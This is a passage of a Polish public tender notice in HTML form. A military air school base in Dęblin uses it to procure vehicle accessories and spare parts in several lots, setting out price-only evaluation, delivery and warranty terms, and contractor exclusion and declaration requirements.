<h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa akcesoriów samochodowych (zawiesia)<br/><br/>1)	Przedmiotem zamówienia jest dostawa akcesoriów samochodowych w ilościach i asortymencie określonym w Formularzu ofertowym załącznik nr 1 do SWZ.<br/>2)	Akcesoria samochodowe powinny być fabrycznie nowe, w opakowaniach producenta, wolne od wad technicznych, wysokiej jakości odpowiadające swemu przeznaczeniu.<br/>3) Zamawiający wymaga aby wymieniony towar był objęty gwarancją wystawioną przez wykonawcę na okres minimum 24 miesięcy od daty odbioru dostawy akcesoriów samochodowych. <br/>4)	Dostarczony asortyment musi posiadać dokumentację w języku polskim oraz spełniać dyrektywę maszynową 2006 42/WE jak również być zgodny z normą PN-EN 818-4.<br/>5)	Dostawa akcesoriów samochodowych powinna być dokonana do miejsca wskazanego przez Zamawiającego – magazynu czołgowo-samochodowego, znajdującego się na terenie 41 Bazy Lotnictwa Szkolnego w Dęblinie w dni robocze od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy w godz. 8:00 – 15:00, w cenie zgodnej z ofertą cenową ujętą przez Wykonawcę w formularzu ofertowym. Dostawa nastąpi na koszt Wykonawcy. O dokładnym terminie dostawy Wykonawca powiadomi Zamawiającego z wyprzedzeniem co najmniej jednodniowym w kontaktach roboczych (telefonicznie numer telefonu 261 518 812 lub 261 517 883).<br/>6)	Wykonawca zobowiązuje się dostarczyć Zamawiającemu akcesoria samochodowe wymienione w Formularzu ofertowym, stanowiącym załącznik nr 1 do SWZ w terminie 30 dni roboczych od dnia zawarcia umowy ( od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy).<br/>7)	Wykonawca zobowiązuje się do dostarczenia akumulatory do miejsca wskazanego przez Zamawiającego na własny koszt i ryzyko. Wykonawca ponosi odpowiedzialność (ryzyko utraty, uszkodzenia itp., powstałe w czasie transportu) za przedmiot Umowy do czasu jego formalnego przyjęcia przez Odbiorcę.<br/><br/> Części i akcesoria do pojazdów i silników do nich- 34300000-0 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 41650 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34300000-0 - Części i akcesoria do pojazdów i silników do nich</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryteriami i ich znaczeniem (wagą): <br/><br/>X - cena brutto oferty – waga 100% <br/><br/>X = (Cn : Cb) x 100 x 100% (ilość punktów) <br/><br/>gdzie <br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty” <br/>Cn– najniższe całkowite wynagrodzenie brutto w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 8 Tabeli Nr 1 Formularza ofertowego <br/>Cb – całkowite wynagrodzenie brutto w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 8 Tabeli Nr 1 Formularza ofertowego</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> dostawa części zamiennych do wojskowych pojazdów <br/>(osobowe, mikrobusy)<br/>1)	Przedmiotem zamówienia jest dostawa części zamiennych zawartych w ilościach i szczegółowym asortymencie określonych przez Zamawiającego w załączniku nr 1 do SWZ- formularzu ofertowym. <br/>2)	Części powinny być fabrycznie nowe, w opakowaniach producenta, wolne od wad technicznych, wysokiej jakości odpowiadające swemu przeznaczeniu oraz zgodne z parametrami określonymi przez producentów pojazdów. <br/>3)	Jeżeli w opisie przedmiotu zamówienia wskazano numery katalogowe to należy rozumieć, że zostały zamieszczone w celu precyzyjnego określenia specyfikacji żądanego asortymentu ( wg oznaczenia producenta pojazdu). Zamawiający dopuszcza wyroby o podanych numerach katalogowych lub wyroby inne, z zastrzeżeniem, iż będą to wyroby kompatybilne( zgodne dla pojazdu/ sprzętu, dla którego jest on przeznaczony.<br/>4)	Zamawiający dopuszcza dostarczenie przez Wykonawcę dostępnych na rynku zamienników części, o jakości porównywalnej z częściami oryginalnymi lub dokonania regeneracji elementu w przypadkach technicznie i ekonomicznie uzasadnionych.<br/>5)	Zamawiający dopuszcza, aby Wykonawca dostarczył części nie sygnowanych logo producenta pojazdu, lecz oznaczonych znakiem producenta części, odpowiadającej standardowi Q lub przy użyciu części oznaczonych symbolem P, tj. części odpowiadających jakości częściom przy montażu fabrycznym. Zgodnie z Rozporządzeniem Komisji UE nr 461/2010 (dyrektywa GVO) dopuszcza się dostarczenie części do pojazdów zamiast części pierwszego montażu, części oryginalnych oznaczonych symbolem Q. Części te produkowane są z zastosowaniem tej samej technologii i przez tych samych producentów części, którzy dostarczają części na pierwszy montaż, tyle, że sygnowane swoim logo- czyli producenta części. To samo dotyczy także stosowania części zamiennych oznaczonych symbolem P.. Odpowiadają one jakością elementom stosowanym w montażu fabrycznych, ale wytwarzane są przez firmy, które nie dostarczają ich producentom pojazdów. <br/>6)	Zamawiający wymaga aby wymieniony towar był objęty gwarancją wystawioną przez wykonawcę na okres minimum 12 miesięcy od daty odbioru dostawy części zamiennych. <br/>7)	Dostarczony asortyment musi posiadać dokumentację w języku polskim. <br/>8)	Dostawa części zamiennych powinna być dokonana do miejsca wskazanego przez Zamawiającego – magazynu czołgowo-samochodowego, znajdującego się na terenie 41 Bazy Lotnictwa Szkolnego w Dęblinie w dni robocze od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy w godz. 8:00 – 15:00, w cenie zgodnej z ofertą cenową ujętą przez Wykonawcę w formularzu ofertowym. Dostawa nastąpi na koszt Wykonawcy. O dokładnym terminie dostawy Wykonawca powiadomi Zamawiającego z wyprzedzeniem co najmniej jednodniowym w kontaktach roboczych (telefonicznie numer telefonu 261 518 812 lub 261 517 883).<br/>9)	Wykonawca zobowiązuje się dostarczyć Zamawiającemu części wymienione w formularzu ofertowym, stanowiącym załącznik nr 1 do SWZ w terminie 10 dni roboczych od dnia zawarcia umowy ( od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy).<br/>10)	Wykonawca zobowiązuje się do dostarczenia części do miejsca wskazanego przez Zamawiającego na własny koszt i ryzyko. Wykonawca ponosi odpowiedzialność (ryzyko utraty, uszkodzenia itp., powstałe w czasie transportu) za przedmiot Umowy do czasu jego formalnego przyjęcia przez Odbiorcę.<br/><br/>Części i akcesoria do pojazdów i silników do nich 34300000-0 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 11137 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34300000-0 - Części i akcesoria do pojazdów i silników do nich</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryteriami i ich znaczeniem (wagą): <br/><br/>X - cena brutto oferty – waga 100% <br/><br/>X = (Cn : Cb) x 100 x 100% (ilość punktów) <br/><br/>gdzie <br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty” <br/>Cn– najniższe całkowite wynagrodzenie brutto w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 8 Tabeli Nr 1 Formularza ofertowego <br/>Cb – całkowite wynagrodzenie brutto w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 8 Tabeli Nr 1 Formularza ofertowego</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> dostawa części zamiennych do wojskowych pojazdów <br/>(ciężarowe, autobusy)<br/>1)	Przedmiotem zamówienia jest dostawa części zamiennych zawartych w ilościach i szczegółowym asortymencie określonych przez Zamawiającego w załączniku nr 1 do SWZ- formularzu ofertowym. <br/>2)	Części powinny być fabrycznie nowe, w opakowaniach producenta, wolne od wad technicznych, wysokiej jakości odpowiadające swemu przeznaczeniu oraz zgodne z parametrami określonymi przez producentów pojazdów. <br/>3)	Jeżeli w opisie przedmiotu zamówienia wskazano numery katalogowe to należy rozumieć, że zostały zamieszczone w celu precyzyjnego określenia specyfikacji żądanego asortymentu ( wg oznaczenia producenta pojazdu). Zamawiający dopuszcza wyroby o podanych numerach katalogowych lub wyroby inne, z zastrzeżeniem, iż będą to wyroby kompatybilne( zgodne dla pojazdu/ sprzętu, dla którego jest on przeznaczony.<br/>4)	Zamawiający dopuszcza dostarczenie przez Wykonawcę dostępnych na rynku zamienników części, o jakości porównywalnej z częściami oryginalnymi lub dokonania regeneracji elementu w przypadkach technicznie i ekonomicznie uzasadnionych.<br/>5)	Zamawiający dopuszcza, aby Wykonawca dostarczył części nie sygnowanych logo producenta pojazdu, lecz oznaczonych znakiem producenta części, odpowiadającej standardowi Q lub przy użyciu części oznaczonych symbolem P, tj. części odpowiadających jakości częściom przy montażu fabrycznym. Zgodnie z Rozporządzeniem Komisji UE nr 461/2010 (dyrektywa GVO) dopuszcza się dostarczenie części do pojazdów zamiast części pierwszego montażu, części oryginalnych oznaczonych symbolem Q. Części te produkowane są z zastosowaniem tej samej technologii i przez tych samych producentów części, którzy dostarczają części na pierwszy montaż, tyle, że sygnowane swoim logo- czyli producenta części. To samo dotyczy także stosowania części zamiennych oznaczonych symbolem P.. Odpowiadają one jakością elementom stosowanym w montażu fabrycznych, ale wytwarzane są przez firmy, które nie dostarczają ich producentom pojazdów. <br/>6)	Zamawiający wymaga aby wymieniony towar był objęty gwarancją wystawioną przez wykonawcę na okres minimum 12 miesięcy od daty odbioru dostawy części zamiennych. <br/>7)	Dostarczony asortyment musi posiadać dokumentację w języku polskim. <br/>8)	Dostawa części zamiennych powinna być dokonana do miejsca wskazanego przez Zamawiającego – magazynu czołgowo-samochodowego, znajdującego się na terenie 41 Bazy Lotnictwa Szkolnego w Dęblinie w dni robocze od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy w godz. 8:00 – 15:00, w cenie zgodnej z ofertą cenową ujętą przez Wykonawcę w formularzu ofertowym. Dostawa nastąpi na koszt Wykonawcy. O dokładnym terminie dostawy Wykonawca powiadomi Zamawiającego z wyprzedzeniem co najmniej jednodniowym w kontaktach roboczych (telefonicznie numer telefonu 261 518 812 lub 261 517 883).<br/>9)	Wykonawca zobowiązuje się dostarczyć Zamawiającemu części wymienione w formularzu ofertowym, stanowiącym załącznik nr 1 do SWZ w terminie 10 dni roboczych od dnia zawarcia umowy ( od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy).<br/>10)	Wykonawca zobowiązuje się do dostarczenia części do miejsca wskazanego przez Zamawiającego na własny koszt i ryzyko. Wykonawca ponosi odpowiedzialność (ryzyko utraty, uszkodzenia itp., powstałe w czasie transportu) za przedmiot Umowy do czasu jego formalnego przyjęcia przez Odbiorcę.<br/><br/>Części i akcesoria do pojazdów i silników do nich 34300000-0 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 22100 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34300000-0 - Części i akcesoria do pojazdów i silników do nich</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryteriami i ich znaczeniem (wagą): <br/><br/>X - cena brutto oferty – waga 100% <br/><br/>X = (Cn : Cb) x 100 x 100% (ilość punktów) <br/><br/>gdzie <br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty” <br/>Cn– najniższe całkowite wynagrodzenie brutto w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 8 Tabeli Nr 1 Formularza ofertowego <br/>Cb – całkowite wynagrodzenie brutto w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 8 Tabeli Nr 1 Formularza ofertowego</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> dostawa części zamiennych do wojskowych pojazdów <br/>(ciężarowe -specjalne, dźwig)<br/>1)	Przedmiotem zamówienia jest dostawa części zamiennych zawartych w ilościach i szczegółowym asortymencie określonych przez Zamawiającego w załączniku nr 1 do SWZ- formularzu ofertowym. <br/>2)	Części powinny być fabrycznie nowe, w opakowaniach producenta, wolne od wad technicznych, wysokiej jakości odpowiadające swemu przeznaczeniu oraz zgodne z parametrami określonymi przez producentów pojazdów. <br/>3)	Jeżeli w opisie przedmiotu zamówienia wskazano numery katalogowe to należy rozumieć, że zostały zamieszczone w celu precyzyjnego określenia specyfikacji żądanego asortymentu ( wg oznaczenia producenta pojazdu). Zamawiający dopuszcza wyroby o podanych numerach katalogowych lub wyroby inne, z zastrzeżeniem, iż będą to wyroby kompatybilne( zgodne dla pojazdu/ sprzętu, dla którego jest on przeznaczony.<br/>4)	Zamawiający dopuszcza dostarczenie przez Wykonawcę dostępnych na rynku zamienników części, o jakości porównywalnej z częściami oryginalnymi lub dokonania regeneracji elementu w przypadkach technicznie i ekonomicznie uzasadnionych.<br/>5)	Zamawiający dopuszcza, aby Wykonawca dostarczył części nie sygnowanych logo producenta pojazdu, lecz oznaczonych znakiem producenta części, odpowiadającej standardowi Q lub przy użyciu części oznaczonych symbolem P, tj. części odpowiadających jakości częściom przy montażu fabrycznym. Zgodnie z Rozporządzeniem Komisji UE nr 461/2010 (dyrektywa GVO) dopuszcza się dostarczenie części do pojazdów zamiast części pierwszego montażu, części oryginalnych oznaczonych symbolem Q. Części te produkowane są z zastosowaniem tej samej technologii i przez tych samych producentów części, którzy dostarczają części na pierwszy montaż, tyle, że sygnowane swoim logo- czyli producenta części. To samo dotyczy także stosowania części zamiennych oznaczonych symbolem P.. Odpowiadają one jakością elementom stosowanym w montażu fabrycznych, ale wytwarzane są przez firmy, które nie dostarczają ich producentom pojazdów. <br/>6)	Zamawiający wymaga aby wymieniony towar był objęty gwarancją wystawioną przez wykonawcę na okres minimum 12 miesięcy od daty odbioru dostawy części zamiennych. <br/>7)	Dostarczony asortyment musi posiadać dokumentację w języku polskim. <br/>8)	Dostawa części zamiennych powinna być dokonana do miejsca wskazanego przez Zamawiającego – magazynu czołgowo-samochodowego, znajdującego się na terenie 41 Bazy Lotnictwa Szkolnego w Dęblinie w dni robocze od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy w godz. 8:00 – 15:00, w cenie zgodnej z ofertą cenową ujętą przez Wykonawcę w formularzu ofertowym. Dostawa nastąpi na koszt Wykonawcy. O dokładnym terminie dostawy Wykonawca powiadomi Zamawiającego z wyprzedzeniem co najmniej jednodniowym w kontaktach roboczych (telefonicznie numer telefonu 261 518 812 lub 261 517 883).<br/>9)	Wykonawca zobowiązuje się dostarczyć Zamawiającemu części wymienione w formularzu ofertowym, stanowiącym załącznik nr 1 do SWZ w terminie 10 dni roboczych od dnia zawarcia umowy ( od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy).<br/>10)	Wykonawca zobowiązuje się do dostarczenia części do miejsca wskazanego przez Zamawiającego na własny koszt i ryzyko. Wykonawca ponosi odpowiedzialność (ryzyko utraty, uszkodzenia itp., powstałe w czasie transportu) za przedmiot Umowy do czasu jego formalnego przyjęcia przez Odbiorcę.<br/><br/>Części i akcesoria do pojazdów i silników do nich 34300000-0 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 5500 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34300000-0 - Części i akcesoria do pojazdów i silników do nich</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryteriami i ich znaczeniem (wagą): <br/><br/>X - cena brutto oferty – waga 100% <br/><br/>X = (Cn : Cb) x 100 x 100% (ilość punktów) <br/><br/>gdzie <br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty” <br/>Cn– najniższe całkowite wynagrodzenie brutto w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 8 Tabeli Nr 1 Formularza ofertowego <br/>Cb – całkowite wynagrodzenie brutto w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 8 Tabeli Nr 1 Formularza ofertowego</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">B.	Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, następujących podmiotowych środków dowodowych potwierdzających brak podstaw do wykluczenia Wykonawcy: <br/>1.	W zakresie potwierdzenia braku podstaw do wykluczenia wykonawcy z postępowania zamawiający zażąda: <br/>1.1.	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4) ustawy Pzp; <br/><br/>Zgodnie z treścią art. 274 ust. 4 ustawy Pzp Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne. W związku z powyższym, jeżeli Wykonawca oraz każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia – konsorcja/spółki cywilne – wskaże w oświadczeniu załącznik Nr 2c/2d do SWZ bazy, z których Zamawiający bezpłatnie może pozyskać określone dokumenty potwierdzające sytuację podmiotową Wykonawcy – to Zamawiający nie będzie wzywał Wykonawcy do ich złożenia. <br/>1.2.	oświadczenia Wykonawcy o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę/ ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty/oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 108 ust. 1 pkt 5 ustawy Pzp Wzór oświadczenia stanowi załącznik nr 3 do SWZ.<br/>2.	UWAGA: W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum, spółka cywilna), dokumenty, o których mowa w pkt. 1.1.2. musi złożyć każdy partner konsorcjum/ wspólnik spółki cywilnej. <br/>3.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w pkt. 1.1.1 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokumenty, o których mowa w zdaniu poprzedzającym powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem. <br/>4.	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 3, lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1), 2) i 4), art., 109 ust. 1 pkt 1) ustawy Pzp zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 5)	Przedmiotowe środki dowodowe-( jeśli dotyczy) potwierdzające, że oferowane przez Wykonawcę produkty równoważne spełniają wymagania określone przez Zamawiającego- (jeśli Wykonawca oferuje produkty równoważne).<br/>6)	Wykonawca oferujący produkt zgodny z opisem przedmiotu zamówienia (zawartym w Formularzu ofertowym- kolumna nr 2 w Formularzu ofertowym)- nie ma obowiązku składania żadnych dokumentów w tym zakresie- na etapie składania oferty. Jeśli Wykonawca złoży oświadczenie, że ofertuje produkt równoważny, a nie złoży przedmiotowych środków dowodowych- Zamawiajacy wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Dokumenty potwierdzające, że oferowane przez Wykonawcę produkty równoważne spełniają wymagania określone przez Zamawiającego <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> A.	Wykonawcy zobowiązani są załączyć do oferty następujące<br/>dokumenty:<br/>1)	Oświadczenie o spełnieniu warunków udziału w postępowaniu (według wzoru – załącznika Nr 2a do SWZ) - podpisane przez osoby upoważnione do reprezentowania Wykonawcy.<br/>2)	Oświadczenie o niepodleganiu wykluczeniu (według wzoru – załącznika Nr 2c do SWZ) – podpisane przez osoby upoważnione do reprezentowania Wykonawcy.<br/>3)	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców:<br/>a)	oświadczenia, o których mowa w pkt 1 i 2 składa każdy z Wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy<br/>z wykonawców wykazuje spełnianie warunków udziału w postępowaniu,<br/>b)	oświadczenie składane na podstawie art. 117 ust. 4 ustawy Pzp – składają tylko Wykonawcy wspólnie ubiegający się o udzielenie zamówienia. Z świadczenia musi wynikać, które dostawy wykonają poszczególni Wykonawcy (według wzoru – załącznika Nr 4 do SWZ)<br/>4)	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem własnym, o którym mowa w pkt 1 i 2, także:<br/>a)	oświadczenie podmiotu udostępniającego zasoby potwierdzające brak podstaw wykluczenia tego podmiotu (według wzoru – załącznika Nr 2d do SWZ) oraz<br/>b)	oświadczenie podmiotu udostępniającego zasoby potwierdzające spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby (według wzoru – załącznika Nr 2b do SWZ).<br/>5)	Przedmiotowe środki dowodowe-( jeśli dotyczy) potwierdzające, że oferowane przez Wykonawcę produkty równoważne spełniają wymagania określone przez Zamawiającego- (jeśli Wykonawca oferuje produkty równoważne).<br/>6)	Wykonawca oferujący produkt zgodny z opisem przedmiotu zamówienia (zawartym w Formularzu ofertowym- kolumna nr 2 w Formularzu ofertowym)- nie ma obowiązku składania żadnych dokumentów 